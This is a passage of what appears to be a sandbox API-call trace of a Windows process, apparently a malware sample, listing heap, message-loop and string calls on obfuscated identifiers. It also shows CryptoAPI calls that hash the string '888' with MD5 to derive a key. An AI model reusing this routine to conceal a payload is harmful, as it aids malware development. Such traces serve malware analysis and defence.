lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0214.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0214.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0214.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0214.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0214.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0214.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0214.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0214.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0214.809] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0214.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0214.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.810] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0214.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0214.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0214.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0214.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0214.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0214.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0214.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0214.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0214.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0214.810] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.810] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.810] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0214.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0214.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0214.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0214.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0214.810] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.811] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0214.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0214.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0214.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0214.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0214.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0214.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0214.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0214.811] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0214.811] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0214.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0214.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0214.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0214.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0214.811] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.811] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.811] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.811] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.811] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0214.811] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0214.811] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.811] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.811] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0214.812] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.812] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0214.812] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0214.812] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0214.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f70e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0214.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0214.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ee0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0214.812] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c330) returned 1 [0214.813] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.813] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.813] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0214.813] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.813] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0214.813] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.813] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.813] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.813] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.813] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.813] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.813] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0214.813] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.813] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0214.813] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.813] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.813] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.813] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.813] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.814] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.814] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.814] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0214.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.814] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0214.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.814] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0214.814] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.814] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0214.814] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.814] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.814] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.814] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.814] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.814] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.816] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.816] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.816] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.816] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0214.816] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.816] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0214.816] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.816] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.816] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.816] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.816] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.817] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.817] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.817] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.817] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.817] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.817] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.817] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0214.817] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.817] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0214.817] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.817] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.817] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0214.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab5c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0214.817] CryptCreateHash (in: hProv=0xa7c330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0214.817] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.817] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.817] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.817] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0214.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72738, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0214.817] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0214.817] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0214.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a726a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0214.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.818] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.818] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.818] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.818] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.818] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.818] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0214.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab548, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0214.818] CryptHashData (hHash=0x9e2138, pbData=0x2a72738, dwDataLen=0x3, dwFlags=0x1) returned 1 [0214.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.818] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.818] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.818] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.818] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.818] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.818] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0214.818] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.818] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0214.819] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.819] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.819] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, 